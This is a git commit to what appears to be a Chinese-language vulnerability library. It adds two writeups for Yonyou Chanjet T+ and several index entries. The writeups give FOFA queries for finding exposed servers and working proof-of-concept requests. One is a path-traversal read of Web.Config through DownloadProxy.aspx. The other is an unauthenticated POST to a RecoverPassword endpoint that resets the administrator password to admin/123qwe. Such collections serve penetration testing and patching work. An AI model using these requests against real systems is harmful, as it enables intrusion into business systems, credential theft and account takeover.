更新漏洞库:Web应用漏洞/

This commit is contained in:
Threekiii 2022-09-09 10:51:42 +08:00
parent c0a2d6662b
commit d14921f6de
3 changed files with 68 additions and 0 deletions

View File

@ -310,6 +310,8 @@
* 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞 * 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
* 深信服 日志中心 c.php 远程命令执行漏洞 * 深信服 日志中心 c.php 远程命令执行漏洞
* 深信服 行为感知系统 c.php 远程命令执行漏洞 * 深信服 行为感知系统 c.php 远程命令执行漏洞
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
* 畅捷CRM get_usedspace.php SQL注入漏洞 * 畅捷CRM get_usedspace.php SQL注入漏洞
* 畅捷CRM 后台附件任意文件上传漏洞 * 畅捷CRM 后台附件任意文件上传漏洞
* 科达 MTS转码服务器 任意文件读取漏洞 * 科达 MTS转码服务器 任意文件读取漏洞
@ -369,6 +371,7 @@
* Apache Solr 任意文件读取漏洞 * Apache Solr 任意文件读取漏洞
* Apache Solr 远程执行漏洞 CVE-2019-0193 * Apache Solr 远程执行漏洞 CVE-2019-0193
* Apache Spark create 未授权访问漏洞 * Apache Spark create 未授权访问漏洞
* Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891
* Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631 * Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631
* Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805 * Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805
* Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938 * Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938

View File

@ -0,0 +1,32 @@
# 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
## 漏洞描述
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
## 漏洞影响
```
用友 畅捷通T+
```
## FOFA
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
![image-20220909104559292](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091045361.png)
验证POC
```
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
```
![image-20220909104628456](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091046535.png)

View File

@ -0,0 +1,33 @@
# 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
## 漏洞描述
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台
## 漏洞影响
```
用友 畅捷通T+
```
## FOFA
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
![image-20220909104559292](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091048224.png)
验证POC, 重置账号密码为 `admin/123qwe`
```
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
```
![image-20220909104816391](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202209091048450.png)